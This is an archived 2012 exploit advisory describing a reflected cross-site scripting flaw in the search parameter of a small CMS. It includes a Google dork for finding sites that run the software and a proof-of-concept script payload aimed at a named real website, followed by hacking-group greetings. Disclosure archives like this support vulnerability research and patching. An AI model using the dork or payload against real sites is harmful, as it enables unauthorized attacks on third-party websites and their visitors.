Big B Trading CMS Cross Site Scripting

2012-01-10T00:00:00
ID PACKETSTORM:108543
Type packetstorm
Reporter Am!r
Modified 2012-01-10T00:00:00

Description

                                        
                                            `############################################################################  
# Exploit Title:Big B Trading CMS Cross Site Scripting Vulnerabilitiy  
# Google Dork: intext:"Website by Big B Trading"  
# Date: 10/1/2012  
# Author: H4ckCity Security Team & IrIsT  
# Discovered By: Am!r  
# Home: WwW.H4ckCity.Org   
# Software Link: www.bigb-trading.com  
# Version: All Version  
# Category:: webapps  
# Security Risk:: Low  
# Tested on: GNU/Linux Ubuntu - Windows Server - win7  
############################################################################  
# Exploit:  
#   
# http://[target]/search.php?q=[XSS]  
#  
#   
# Demo:  
#  
# www.golfersfriend.co.za/search.php?q="><script>alert('XSS')</script>  
#  
############################################################################  
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-farbodmahini-M.Prince-Bl4ck.Viper  
# -iC0d3R-K0242-P0W3RFU7-Mr.M4st3r-Highe_sense ,...  
############################################################################  
GreetZ : All H4ckCity Member - BHG Members - 1337day.com  
############################################################################  
`